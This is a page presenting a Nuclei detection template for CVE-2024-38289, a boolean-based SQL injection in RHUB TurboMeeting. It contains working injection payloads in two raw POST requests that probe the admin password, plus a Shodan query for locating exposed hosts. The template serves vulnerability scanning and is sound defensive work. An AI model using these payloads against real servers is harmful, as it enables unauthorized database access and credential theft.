TurboMeeting - Boolean-based SQL Injection
ID: CVE-2024-38289
Severity: critical
Author: rootxharsh,iamnoooob,pdresearch
Tags: cve,cve2024,sqli,turbomeeting
Description
Section titled “Description”A Boolean-based SQL injection vulnerability in the “RHUB TurboMeeting” web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
YAML Source
Section titled “YAML Source”id: CVE-2024-38289
info: name: TurboMeeting - Boolean-based SQL Injection author: rootxharsh,iamnoooob,pdresearch severity: critical description: | A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server. reference: - https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v classification: cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: rhubcom product: turbomeeting shodan-query: html:"TurboMeeting" tags: cve,cve2024,sqli,turbomeeting
http: - raw: - | POST /as/wapi/vmp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/** - | POST /as/wapi/vmp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
matchers-condition: and matchers: - type: word part: body_1 words: - '<__Status__>SUCCEED</__Status__>'
- type: word part: body_2 words: - '<__Status__>FAILED</__Status__>'# digest: 490a00463044022071804b7886201b730756e9ad74ab7d98205dbae7351b82065dbb6858e050e20602200ea5de3fff565a90423ba8215b5e5e1c44e0b0b774b55fe5a7bc7da7f0cfc8a0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-38289.yaml"